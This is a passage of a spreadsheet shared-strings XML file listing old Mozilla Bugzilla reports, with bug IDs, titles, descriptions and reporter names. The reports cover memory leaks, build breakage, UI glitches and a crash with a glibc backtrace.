reducing. After a few reloads Mozilla crashed because there's too little memory
available. The problem does not occur in Mozilla 1.3. 
The problem is reproduceable on the Mozilla 1.4b release for the Windows
platform. (I checked)
Every reload reduces the amount of free memory with about 10-20 MB. (WOW :P)
Reproducible: Always
Steps to Reproduce:
1. Open my webpage
2. Hit reload
3. Repeat 2 until Mozilla crashes
Actual Results:  
Mozilla gets killed.
Expected Results:  
Stop claiming extra memory.
I'm not sure but I guess it could be related to the usage of -moz-opacity in
the CSS I really can't figure out any other reason at the moment. Furthermore I
haven't got the foggiest Idea how to use the Debug-&gt;Leak detector in the menu.</t>
  </si>
  <si>
    <t>bhun</t>
  </si>
  <si>
    <t>OTHER_APPLICATIONS-358611</t>
  </si>
  <si>
    <t>Saving a view leaks OutputProgressListener</t>
  </si>
  <si>
    <t>When saving a ChatZilla view we use OutputProgressListener to track the save and make sure it all goes alright. Unfortunately the object is then leaked. I think wbp.progressListener should be reset to null somewhere. (The leak is because wbp is used in the scope of OutputProgressListener and so you have a loop between the WBP object and the OutputProgressListener.)</t>
  </si>
  <si>
    <t>CORE-233587</t>
  </si>
  <si>
    <t>small nsImageFrame cleanup</t>
  </si>
  <si>
    <t>GetAnchorHREFAndTarget can just use nsILink instead of nsIDOMHTMLAnchorElement
with the advantage that it gives back an nsIURI*.</t>
  </si>
  <si>
    <t>MOZILLA.ORG-501233</t>
  </si>
  <si>
    <t>svn access to http://svn.mozilla.org/projects/openweb/ for bgalbraith</t>
  </si>
  <si>
    <t>as above v=laura</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-182969</t>
  </si>
  <si>
    <t>grade.pressegrosso.de - cannot see anything</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.2) Gecko/20021126
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.2) Gecko/20021126
I can get the information (statusline at the bottom?) that data is transferred
and after a while it stops with the message Done but I only see a blank page
Reproducible: Always
Steps to Reproduce:
1.
2.
3.
Expected Results:  
show page like IE 6.0</t>
  </si>
  <si>
    <t>oliver.pet</t>
  </si>
  <si>
    <t>CORE-499027</t>
  </si>
  <si>
    <t>Copying an empty string to a new string causes it to allocate a buffer</t>
  </si>
  <si>
    <t>Steps to reproduce problem:
1. nsCString a b
2. a = b
Expected result: nothing happens
Actual results: a now has a sharable buffer</t>
  </si>
  <si>
    <t>FIREFOX-660714</t>
  </si>
  <si>
    <t>Remove Pinstripe's unused Secure-background.gif</t>
  </si>
  <si>
    <t>Created attachment 536188
rm
Apparently back in Fx 2.0 https sites in the urlbar autocomplete dropdown had a yellow background which was probably handy sometimes but it's been gone since one of the bug 397723 landings in January 2008 so it's probably time to stop shipping the image that used to do it.</t>
  </si>
  <si>
    <t>CORE-411903</t>
  </si>
  <si>
    <t>nsIPopupBoxObject#setConsumeRollupEvent has no effect on Linux</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 ja rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.9b3pre) Gecko/2008011004 Minefield/3.0b3pre
In Firefox 3 nsIPopupBoxObject has a new setConsumeRollupEvent method which enables to decide whether outside clicks of popup should be consumed or not.
However it has effect only on Windows and no effect on Linux.
Reproducible: Always
Steps to Reproduce:
1.Open the subsequent testcase.
2.Click [ROLLUP_NO_CONSUME] button to open popup.
3.Click [TEST] button during popup display.
Actual Results:  
Popup closes and alert dialog opens on all platforms.
Clicks outside of popup should NOT be eaten when we use nsIPopupBoxObject#setConsumeRollupEvent(Ci.nsIPopupBoxObject.ROLLUP_NO_CONSUME).
Expected Results:  
Windows: Popup closes and alert dialog opens.
Linux: Popup closes but alert dialog doesn't open.
Mac: unconfirmed</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-318669</t>
  </si>
  <si>
    <t>[BEOS] bustage from fix to bug 241758</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (BeOS U BeOS BePC en-US rv:1.9a1) Gecko/20051201 Firefox/1.6a1
Build Identifier: Mozilla/5.0 (BeOS U BeOS BePC en-US rv:1.9a1) Gecko/20051201 Firefox/1.6a1
nsFileSystemDataSource.cpp no longer builds under BeOS.
Reproducible: Always
Steps to Reproduce:
1.attempt to build Thunderbird
2.wait for error message
3.
Actual Results:  
build fails - error messages included as attachment.
Expected Results:  
build succeeds</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-357903</t>
  </si>
  <si>
    <t>Show addon title in title bar</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 nl rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 nl rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
When i bookmark an addon page i'd like the addon's title in it.
Reproducible: Always
Steps to Reproduce:
1. Visit https://addons.mozilla.org/firefox/1810/
2. Look at title bar / bookmark page.
Actual Results:  
Firefox Add-ons | Mozilla Corporation
Expected Results:  
Firefox Showcase | Firefox Add-ons | Mozilla Corporation</t>
  </si>
  <si>
    <t>tmptgr</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-201581</t>
  </si>
  <si>
    <t>Top-signature results in body being deleted. Option to not strip sigs on reply</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.3) Gecko/20030312
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.3) Gecko/20030312
When replying to a message that had the signature added at the top mozilla
strips out the sig and everything to the end of the mail.  For instance when an
Outlook user sends me a mail that goes...
body
-- 
sig
code he has sent out for review
...
And I reply to it to add my comments inline with his code I find that the code
has been stripped out as it was assumed to be part of the signature.  jihad
against top-posting aside which would feature me making midnight raids on my
associates computers and changing their preferences on them I have no way
around this.  I would like a preference to not strip sigs at all.
See Bug #62429 comment #77.
Reproducible: Always
Steps to Reproduce:
1.Get mail from an improper MUA
2.Reply to said mail
3.
Actual Results:  
everything from --  to EOF is removed as designed
Expected Results:  
I would like this not to happen.</t>
  </si>
  <si>
    <t>karl.palsson</t>
  </si>
  <si>
    <t>SEAMONKEY-136686</t>
  </si>
  <si>
    <t>original filename is empty in version info</t>
  </si>
  <si>
    <t>version information in the file properties is at the best bad:
- fileversion on files (fx ISimpleDOMDocumentMarshal.dll) are 0.0.0.0
- description is empty
- Company name should be Mozilla.org not Mozilla
- Legal trademark should perhaps mention MPL etc
- Original filename is empty</t>
  </si>
  <si>
    <t>asasaki</t>
  </si>
  <si>
    <t>MOZILLA.ORG-255961</t>
  </si>
  <si>
    <t>firefox installer binary (FirefoxSetup-0.9.3.exe) on ftp.eu.mozilla.org has wrong md5sum / data error during setup</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.7) Gecko/20040707 Firefox/0.8
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.7) Gecko/20040707 Firefox/0.8
FirefoxSetup-0.9.3.exe on ftp.eu.mozilla.org has wrong MD5SUM (it's correct in
MD5SUM-file on server):
  4422550f776f20254f89280b7a17f0f4 *FirefoxSetup-0.9.3.exe
File is okay on ftp.mozilla.org and http://mirror.switch.ch/ftp/mirror/mozilla/
(for example).
Reproducible: Always
Steps to Reproduce:</t>
  </si>
  <si>
    <t>kveton</t>
  </si>
  <si>
    <t>moixa</t>
  </si>
  <si>
    <t>CORE-294440</t>
  </si>
  <si>
    <t>Modal dialogs/JavaScript alerts are resizable when dom.disable_window_open_feature.resizable is true</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.8b2) Gecko/20050513 Firefox/1.0+
Build Identifier: Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.8b2) Gecko/20050513 Firefox/1.0+
Modal dialogs spawned either by Firefox itself (such as SSL warnings) or by
JavaScript in web pages calling window.alert() are resizable by grabbing the
grippy (in Mac OS X) or the window edges (in Windows) and dragging.  These types
of dialog boxes should not be resizable but they are when
dom.disable_window_open_feature.resizable is set to true.
Reproducible: Always
Steps to Reproduce:
1. Set security.warn_entering_secure to true
2. Set dom.disable_window_open_feature.resizable to true
3. Open a new tab and go to https://bugzilla.mozilla.org
4. Grab the bottom right corner of the security warning and attempt to resize it
Actual Results:  
The dialog box is able to be resized allowing you to make it really big or so
small that the OK button is no longer visible.
Expected Results:  
The dialog box should not be resizable regardless of the value of
dom.disable_window_open_feature.resizable.
I verified this bug in both Firefox and Seamonkey (both Classic and Modern) on
the trunk and the latest release versions (1.0.4 and 1.7.8 respectively) on
both Mac OS X and Windows.  This bug is more obvious on Mac OS X since it places
a grippy on the bottom right corner.  The dialogs are only resizable when
dom.disable_window_open_feature.resizable is set to true when it is false they
behave as they should.
The above steps reproduce this bug using a dialog box spawned by Firefox.  I
will attach a testcase which uses a JavaScript alert() windnow.
I apologize if this bug was filed under the wrong component but it was unclear
whether it should be filed as a JavaScript bug a DOM bug or something else...</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-58971</t>
  </si>
  <si>
    <t>gmake clobber_all doesn't work</t>
  </si>
  <si>
    <t>If you do gmake clobber_all from mozilla/java it doesn't successfully complete.
Furthermore if you do gmake clobber_all in 
mozilla/java/webclient/classes_spec it doesn't remove the class directories 
it just rm's them.  This is a big problem.</t>
  </si>
  <si>
    <t>INFRASTRUCTURE_&amp;_OPERATIONS_GRAVEYARD-396238</t>
  </si>
  <si>
    <t>production update</t>
  </si>
  <si>
    <t>air.mozilla.com/tags/production can be pushed live please thanks</t>
  </si>
  <si>
    <t>JSS-324451</t>
  </si>
  <si>
    <t>JSS version on libjss4.so says it is 4.2.1 Beta when it is actually 4.2.2 Beta</t>
  </si>
  <si>
    <t>Fetching version information from CryptoManager
JSS_VERSION = JSS_4_2_2_BETA
NSS_VERSION = NSS_3_11_RTM
NSPR_VERSION = NSPR_4_5_RTM
  Checking for header information in jss library
libjss4.so = $Header: JSS 4.2.1 Beta (debug)  Jan 23 2006 11:03:20 $
This needs to be fixed in the next upgrade fix.</t>
  </si>
  <si>
    <t>FIREFOX-281490</t>
  </si>
  <si>
    <t>Many menu items in sidebar context menu don't work</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 de-DE rv:1.7.5) Gecko/20041111 Firefox/1.0
Build Identifier: Mozilla/5.0 (X11 U Linux i686 de-DE rv:1.7.5) Gecko/20041111 Firefox/1.0
I wrote a small xhtml page with my personal link and created a bookmark which
opens in the sidebar.
when i rightclick anywhere on the page (link / background) the menu-popup
contains more items then normal and none of them work. on a link i can say copy
address which results in no action.
Reproducible: Always
Steps to Reproduce:
1. open bookmark in sidebar
2. rightclick to see menu-popup
3. click on any menuitem.
Actual Results:  
Nothing.
Expected Results:  
The action behind the menuitem e.g. copy the address open a new window or
reload the page. none of the items work.</t>
  </si>
  <si>
    <t>CLOUD_SERVICES-785045</t>
  </si>
  <si>
    <t>Upgrade Required response for Sync 2.0</t>
  </si>
  <si>
    <t>Bug 714304 introduced a kind of upgrade required response for Sync1.1.  We should spec  something similar for Sync2.0.  No code required in storage-syncserver because these rules would be done by the load balancer but we need something in the spec so clients know what to expect.</t>
  </si>
  <si>
    <t>CORE-504622</t>
  </si>
  <si>
    <t>Fieldsets never shrink below their min-intrinsic width even if min-width is explicitly set to 0</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11
This example show the problem. IE and Opera correctly show a fieldset containing a div with horizontal scrollbar. Firefox and Chrome (even worse) instead dont show the scroll.
Removing  make all working ok also in Firefox.
Another way to have the scrollbar is writing the width of the div first div in pixel... but I want 100% because I need auto-resizing.
  fieldset
    test    test     test    test
Reproducible: Always
Steps to Reproduce:
1.Try removing fieldset on the above example.
2.
3.
Expected Results:  
The expected result is having horizontal scrollbar appear.
The fieldset should act as other containers e.g. a div. and don't have to change the way an inside div work.
I don't found a workaround and I'm going to using styled div to resemble as a fieldset with legend.</t>
  </si>
  <si>
    <t>riksoft</t>
  </si>
  <si>
    <t>CLOUD_SERVICES-445186</t>
  </si>
  <si>
    <t>Weave Sign-In Dialog Cancel button doesn't actually cancel anything while I'm signing in</t>
  </si>
  <si>
    <t>Steps to reproduce:
 1. Open up Weave Sign In Dialog (Click Weave icon choose Sign In).
 2. Click Sign In on dialog.
 3. Press Cancel at any time while Weave is signing in.
ACTUAL RESULTS:
  Dialog disappears which seems to indicate that Weave has accepted your command but **Weave still signs in**.
EXPECTED RESULTS:
  *Option A) Weave cancels your sign-in. (Weave status bar should go back to Offline/Sign In.)
  *Option B) Cancel button is disabled during the sign-in process (since it doesn't seem to have any useful purpose at that time).
Option B seems simpler to me.
(Though if Labs actually wants in-progress Weave Sign-Ins to be cancellable then Cancel should be available actually work per Option A)
VERSION INFO:
Ubuntu Linux 8.04
Firefox 3.0.0
Weave 0.2.4</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-357597</t>
  </si>
  <si>
    <t>Popup blocking preferences allow input when no data is in whitelist URL field</t>
  </si>
  <si>
    <t>On the 2006101622 trunk build...
1) Open Prefs -&gt; Web Features.
2) Edit popup exceptions list.
3) Focus should be in Site field. If it isn't put the cursor there.
4) Hit return.
5) Note scheme:http entry added to whitelist.
We should probably prevent this from happening since it would potentially allow fairly basic users to accidentally whitelist ALL popups. I suggest that we should disable the Add button unless there's data in the Site field.
I'm filing this as UNCO as I'm currently unable to reproduce it. I have no idea what happened in the five minutes since I started filing the bug.</t>
  </si>
  <si>
    <t>FIREFOX_FOR_ANDROID_GRAVEYARD-497988</t>
  </si>
  <si>
    <t>Ts / Txul regression on 2009-06-09 (Error Console)</t>
  </si>
  <si>
    <t>Created attachment 383014
patch
The Error Console landing looks like it regression startup and windowopen performance.
I want to see if the  in the XUL is to blame. This patch removes the  from browser.xul and only creates the  when switching to the Error Console view.
This patch also removes the Error Console header which was breaking portrait mode and removes an unused console.css link.</t>
  </si>
  <si>
    <t>CALENDAR-353999</t>
  </si>
  <si>
    <t>fifteen- (15-) minute events make later events align too early in day/week(multiday) view</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.9a1) Gecko/20060922 Calendar/0.3a2+
Fifteen minute events make later events align too early in day view and week view (multiday view).
Reproducible: Always
Steps to Reproduce:
1. In day view or week view drag events at 
8:15-8:30 
9:15-9:30 
10:15-10:30
...
18:15-18:30
19:15-19:30
Actual Results:  
By the evening events appear to start at the top of the hour instead of 15 minutes in.
Expected Results:  
Each event start should be aligned at the 15 minute point 1/4 the way down the hour box.
Problem does not seem to occur for 30 minute events.</t>
  </si>
  <si>
    <t>CORE-87241</t>
  </si>
  <si>
    <t>Possible Leak in nsParser?</t>
  </si>
  <si>
    <t>I can't convince myself that it is possible to trigger this but I can't
convince myself that it isnt.</t>
  </si>
  <si>
    <t>Deinst</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-453534</t>
  </si>
  <si>
    <t>Need a place to host localizations for Penelope</t>
  </si>
  <si>
    <t>The Penelope project  was created to help migrate Classic Eudora users over to using Thunderbird.  It's an extension to Thunderbird that provides the look and feel of Eudora and some of Eudora's features.  The source code for Penelope is kept in .
It would be nice to get localizations of Penelope in to other languages.  Rimas Kudelis  has already created localizations in to Lithuanian.  Could a place to store these localizations get created in the standard l10n-central repository?
Thanks!</t>
  </si>
  <si>
    <t>TOOLKIT_GRAVEYARD-333079</t>
  </si>
  <si>
    <t>compile failure on branch</t>
  </si>
  <si>
    <t>nsMetricsEventItem.cpp fails to build on MOZILLA_1_8_BRANCH because nsString.h isn't getting included.</t>
  </si>
  <si>
    <t>CORE-297389</t>
  </si>
  <si>
    <t>dropdown select options chopped off</t>
  </si>
  <si>
    <t>With linux trunk 2005060905 when I load the bug page in the URL the XP Apps:
GUI Features shows as XP Apps: G.  This has been reported before but it was
never reproducible I can't find the bug and I think it's resolved WFM.  And I
have a testcase.  This bug doesn't show up with 1.7.x builds but shows up with
1.8a1.  I can poke nightlies before that if needed.</t>
  </si>
  <si>
    <t>CORE-282050</t>
  </si>
  <si>
    <t>browser.xul.error_pages.enabled should take effect immediately in the same window/tab</t>
  </si>
  <si>
    <t>When you change the value of browser.xul.error_pages.enabled it only takes
effect after the next restart. It should take effect immediately.</t>
  </si>
  <si>
    <t>CORE-869234</t>
  </si>
  <si>
    <t>No barriers are needed on the LIR graph's constant pool</t>
  </si>
  <si>
    <t>Created attachment 746127
v0
LIRGraph's constpool is not tied to the lifetime of a GC thing and the memory can move so it is not safe to have the members be HeapPtrs. Since GC is suppressed any time we have a live LIRGraph the best solution is to just make these Values.</t>
  </si>
  <si>
    <t>terrence.d.cole</t>
  </si>
  <si>
    <t>CORE-498843</t>
  </si>
  <si>
    <t>Whitespace cleanup for cairo-qpainter-surface.cpp</t>
  </si>
  <si>
    <t>Created attachment 383650
WS cleanup patch</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-389172</t>
  </si>
  <si>
    <t>(Bootstrap) Stage step should check out shipped-locales file before using it</t>
  </si>
  <si>
    <t>Created attachment 273315
check out shipped-locales file
As per bug 387970 comment 12 the locale manifest file (shipped-locales) is expected by the Stage step but never actually checked out.</t>
  </si>
  <si>
    <t>SEAMONKEY-290905</t>
  </si>
  <si>
    <t>windows makeall.pl incorrectly sets $topobjdir</t>
  </si>
  <si>
    <t>70 $topobjdir                = $topsrcdir                 if
!defined($topobjdir)
This doesn't work if you have a separate objdir.</t>
  </si>
  <si>
    <t>TOOLKIT-472935</t>
  </si>
  <si>
    <t>Multiple passwords on one page overwrite without prompting</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1
Given a page with two password inputs after saving a password for one of them any future logins with both of them overwrite the first password with the second and the second is filled into the first box.
Reproducible: Always
Steps to Reproduce:
1. Visit a page with two un-differentiated password fields
2. Log in with just the first field save the password when prompted
3. Log in again with both fields
Actual Results:  
No password save prompt second password automatically overwrites saved first password.
Expected Results:  
Prompt to save second password or no prompt and no save.  Definitely not overwriting without prompting.</t>
  </si>
  <si>
    <t>OTHER_APPLICATIONS-235169</t>
  </si>
  <si>
    <t>ChatZilla's motifs should style the user list and other UI elements</t>
  </si>
  <si>
    <t>User-Agent:       
Build Identifier: Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.6) Gecko/20040206 Firefox/0.8
it'd be awesome if the drag-and-drop css support styled the *entire* app. 
thanks for a great irc client. 
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
  </si>
  <si>
    <t>BUGZILLA.MOZILLA.ORG-334959</t>
  </si>
  <si>
    <t>move Core:Location Bar to Seamonkey:Location Bar</t>
  </si>
  <si>
    <t>Firefox has got its own component Location Bar and Autocomplete.</t>
  </si>
  <si>
    <t>SEAMONKEY-78133</t>
  </si>
  <si>
    <t>mozilla 0.8.1 crashes when I try to login into bugzilla</t>
  </si>
  <si>
    <t>From Bugzilla Helper:
User-Agent: Mozilla/4.72 [en] (X11 U Linux 2.2.14-5.0 i686)
BuildID:    2001032614
I have DL mozilla 0.8.1 and installed it from tar.gz. It starts ok. I enter
http://bugzilla.mozilla.org/query.cgi?GoAheadAndLogIn=1
into location and start entering my login name into the appropriate
dialog. As soon I enter the first character of my login name mozilla
crashes.
Here is the output from the crash:
[tina@tina mozilla]$ ./mozilla &amp;
[2] 9571
[tina@tina mozilla]$ ./run-mozilla.sh ./mozilla-bin
MOZILLA_FIVE_HOME=/usr/local/downloads/tarballs/mozilla/0.8.1/mozilla
LD_LIBRARY_PATH=/usr/local/downloads/tarballs/mozilla/0.8.1/mozilla:/usr/local/lib
LIBRARY_PATH=/usr/local/downloads/tarballs/mozilla/0.8.1/mozilla:/usr/local/downloads/tarballs/mozilla/0.8.1/mozilla/components
       SHLIB_PATH=/usr/local/downloads/tarballs/mozilla/0.8.1/mozilla
          LIBPATH=/usr/local/downloads/tarballs/mozilla/0.8.1/mozilla
       ADDON_PATH=/usr/local/downloads/tarballs/mozilla/0.8.1/mozilla
      MOZ_PROGRAM=./mozilla-bin
      MOZ_TOOLKIT=
        moz_debug=0
     moz_debugger=
Registering plugin 0 for: *All types.*
Registering plugin 0 for: *All types.*
JavaScript error: 
 line 0: uncaught exception: Scrollbars in this skin are not properly supporting
mac smart-scrolling prefs!
JavaScript error: 
 line 0: uncaught exception: Scrollbars in this skin are not properly supporting
mac smart-scrolling prefs!
Document http://bugzilla.mozilla.org/ loaded successfully
Document http://bugzilla.mozilla.org/relogin.cgi loaded successfully
Document http://bugzilla.mozilla.org/query.cgi?GoAheadAndLogIn=1 loaded
successfully
BUT .....
if I do NOT start entering my login name and instead of that
I click on stop button everything works just fine
Reproducible: Always
Steps to Reproduce:
1. start mozilla  ( /your/path/to/binary/mozilla &amp;)
2. enter http://bugzilla.mozilla.org/
3. click on  Log out of Bugzilla
4. click on Log in
5. move the mouse into dialog E-mail address: and click in the field
6. start typing
Actual Results:  
Mozilla crashes
Expected Results:  
I should be able to enter into the bugzilla site
As I said before: Everything work ok when I clck first on the stop
button and then proceed with entering my login name</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-465985</t>
  </si>
  <si>
    <t>nsMessengerOSXIntegration registers for root folder changes twice</t>
  </si>
  <si>
    <t>I've noticed that we get two BiffState notifications in the past but as I was working on bug 465381 I saw that this is a more general problem.  Here's nsMessengerOSXIntegration::Init()
  // because we care if the default server changes                                                                                                                              
  rv = accountManager-&gt;AddRootFolderListener(this)
  NS_ENSURE_SUCCESS(rvrv)
  nsCOMPtr mailSession = do_GetService(NS_MSGMAILSESSION_CONTRACTID 
  NS_ENSURE_SUCCESS(rvrv)
  // because we care if the unread total count changes                                                                                                                          
  return mailSession-&gt;AddFolderListener(this nsIFolderListener::boolPropertyChanged | nsIFolderListener::intPropertyChanged)
If I get rid of the call to accountManager-&gt;AddRootFolderListener(this) the problem goes away.  I think this is the case because when we biff on a folder we pass back the root folder vs. the inbox therefore we don't lose anything by not getting ItemInt changes from the account/root itself.
I notice that nsMessengerUnixIntegration doesn't have this duplication but nsMessengerWinIntegration does since you watch for the DefaultServerAtom in nsMessengerWinIntegration::OnItemBoolPropertyChanged.
I favour ripping out the AddRootFolderListener call since I currently don't care if the server changes.  I'm not sure if I should like Windows.  
Let me know and I'll do the patch.</t>
  </si>
  <si>
    <t>WEBTOOLS_GRAVEYARD-509963</t>
  </si>
  <si>
    <t>Simplify top of main tinderboxes</t>
  </si>
  <si>
    <t>Now Committing Rules and Responsibilities is at v1:
https://developer.mozilla.org/En/Developer_Guide/Committing_Rules_and_Responsibilities
we should try and fix consolidate and update the information at the top of all the main tinderboxes to eliminate redundancy and use external sources of information like this one.
The ideal would be if at the top of each tinderbox there was only:
1) A link to CR&amp;R
2) A link to the tree-specific rules for that tree on a wiki somewhere
3) Details of how to contact the sheriff
This means e.g. removing the Checkin Rules sidebar and a lot of the text at the top of each tinderbox. This is actually good because it means that people will not end up reading the same information 5 times. Perhaps it could be replaced with the links to all the relevant Bugzilla queries for that tree.
Gerv</t>
  </si>
  <si>
    <t>CORE-81353</t>
  </si>
  <si>
    <t>Add getter for mAlphaDepth to nsIImage</t>
  </si>
  <si>
    <t>nsIImages are either maskless or they have a 1 bit alpha channel or an 8 bit 
alpha channel. This is stored in a variable called mAlphaDepth.
The patch I'm about to attach exposes this variable through a getter method on 
all platforms. No setter is provided so its read only and pretty risk free.</t>
  </si>
  <si>
    <t>lordpixel</t>
  </si>
  <si>
    <t>OTHER_APPLICATIONS-418798</t>
  </si>
  <si>
    <t>Preference window tooltips are squashed horizontally</t>
  </si>
  <si>
    <t>This is a regression on trunk. Reproduced on:
Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9b2pre) Gecko/2007120610 XULRunner
Mozilla/5.0 (Macintosh U Intel Mac OS X 10.4 en-US rv:1.9a9pre) Gecko/2007110318 XULRunner
Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9b3pre) Gecko/2008012504 Minefield/3.0b3pre
(windows + mac trunk xulrunner windows trunk Fx)
The tooltips are very narrow and hence very high. I'm wondering what's up if the units are wrong or if the x and y are reversed or something else still. I'm very sure this used to work though! And of course this is really a trunk bug but I'm not sure where this goes yet so filing it on us for now...</t>
  </si>
  <si>
    <t>CORE-278835</t>
  </si>
  <si>
    <t>nsTextFormatter: cvt_s could use UTF8ToNewUnicode</t>
  </si>
  <si>
    <t>nsTextFormatter implements an UTF-8 to UTF-16 (or UCS-2 not sure) function
itself. Instead it could just use UTF8ToNewUnicode provided by nsReadableUtils.</t>
  </si>
  <si>
    <t>CORE-479199</t>
  </si>
  <si>
    <t>Abort [@ libc-2.8.90.so@0x2d267 ] when viewing embedded hulu video on Linux.</t>
  </si>
  <si>
    <t>STEPS TO REPRODUCE:
 1. Load URL http://blog.hulu.com/2009/2/9/grammys
 2. Click play in the embedded hulu video
ACTUAL RESULTS:
Immediate abort with this output printed to my terminal in debug builds:
*** glibc detected *** ./dist/bin/firefox-bin: munmap_chunk(): invalid pointer: 0xa1efe220 ***
======= Backtrace: =========
/lib/tls/i686/cmov/libc.so.6[0xb71e1454]
/usr/lib/libGL.so.1[0xa7d8afc5]
======= Memory map: ========
08048000-08063000 r-xp 00000000 08:11 20578417   /scratch/work/builds/mozilla-central/mozilla-central.09-02-03.11-36/obj/dist/bin/firefox-bin
(lots more lines like the above one)
Crash reports: 
http://crash-stats.mozilla.com/report/index/9f6aac17-c850-4689-a40a-095f12090218?p=1
http://crash-stats.mozilla.com/report/index/4408fd7d-74c9-4c2f-b431-300532090218?p=1
VERSION INFO:
 - Ubuntu 8.10 up-to-date on a x86 machine
 - about:plugins shows that I have Flash version 10.0 r15.
 - Firefox builds: I've reproduced this with this morning's mozilla-central nightly...
Mozilla/5.0 (X11 U Linux i686 en-US rv:1.9.2a1pre) Gecko/20090218 Minefield/3.2a1pre
    ... and also with my mozilla-central debug build at revision 1b6278ecd0d7.
Flagging as security-sensitive because this looks like memory corruption which is scary.</t>
  </si>
  <si>
    <t>CALENDAR-324633</t>
  </si>
  <si>
    <t>Error importing Outlook 2002 CSV calendar</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.8) Gecko/20051111 Firefox/1.5
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.9a1) Gecko/20051104 Mozilla Sunbird/0.3a1
I get the following error when importing a CSV calendar file into Sunbird that I exported from Outlook 2002:
Unable to read from file:(path and filename)
[Exception... Cannot modify properties of a WrappedNative nsresult: 0x80570034 (NS_ERROR_XPC_CANT_MODIFY_PROP_ON_WN) location: JS frame :: file:J:/Portable/sunbird/components/calOutlookCSVImportExport.js :: csv_importFromStream :: line 269 data: no
Reproducible: Always
Steps to Reproduce:
1. Export outlook 2002 calendar as csv format
2. Import calendar in Sunbird using type Comma Separated Values (from Outlook)
3.
Actual Results:  
No data is imported.  I get the following error:
Unable to read from file:(path and filename)
[Exception... Cannot modify properties of a WrappedNative nsresult: 0x80570034 (NS_ERROR_XPC_CANT_MODIFY_PROP_ON_WN) location: JS frame :: file:J:/Portable/sunbird/components/calOutlookCSVImportExport.js :: csv_importFromStream :: line 269 data: no
Expected Results:  
Import the calendar data and display it.</t>
  </si>
  <si>
    <t>quark.green</t>
  </si>
  <si>
    <t>CORE-71086</t>
  </si>
  <si>
    <t>FTP currently chains stream converters by hand</t>
  </si>
  <si>
    <t>FTP needs to use the stream converter service for chaining.</t>
  </si>
  <si>
    <t>jud</t>
  </si>
  <si>
    <t>FIREFOX-500143</t>
  </si>
  <si>
    <t>Folder on Bookmarks Toolbar does not open by dragging a link over it the first time</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9.1pre) Gecko/20090623 Firefox/3.5.0
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9.1pre) Gecko/20090623 Shiretoko/3.5pre ID:20090623044415
Folder on Bookmarks Toolbar does not open by doragging over a link at first timeafter restart Firefox.
As for dragging of the second times or more the folder opens successfully. 
Reproducible: Always
Steps to Reproduce:
1.Start Shiretoko with New Profile.
2.Create a Folder on Bookmarks Toolbar.
3.Restart Shiretoko.
4.Dragging over a link onto the folder.
Actual Results:  
The folder does not open.
Expected Results:  
The folder should  open.</t>
  </si>
  <si>
    <t>alice0775</t>
  </si>
  <si>
    <t>CORE-92859</t>
  </si>
  <si>
    <t>nsGenericModule class doesn't allow for class objects without factory creation</t>
  </si>
  <si>
    <t>The generic factory/module macros allow registration of both constructors and
class object-related callbacks. It's not possible however to register to get a
class object (and hence provide class info) without also creating a factory.
There are situations where a module writer may want to have class info for an
implementation class without making it instantiable via XPCOM. The macros should
be able to take a null constructor yet still accept the class object callbacks.</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-174403</t>
  </si>
  <si>
    <t>morkTable::RowToPos doesn't quite work</t>
  </si>
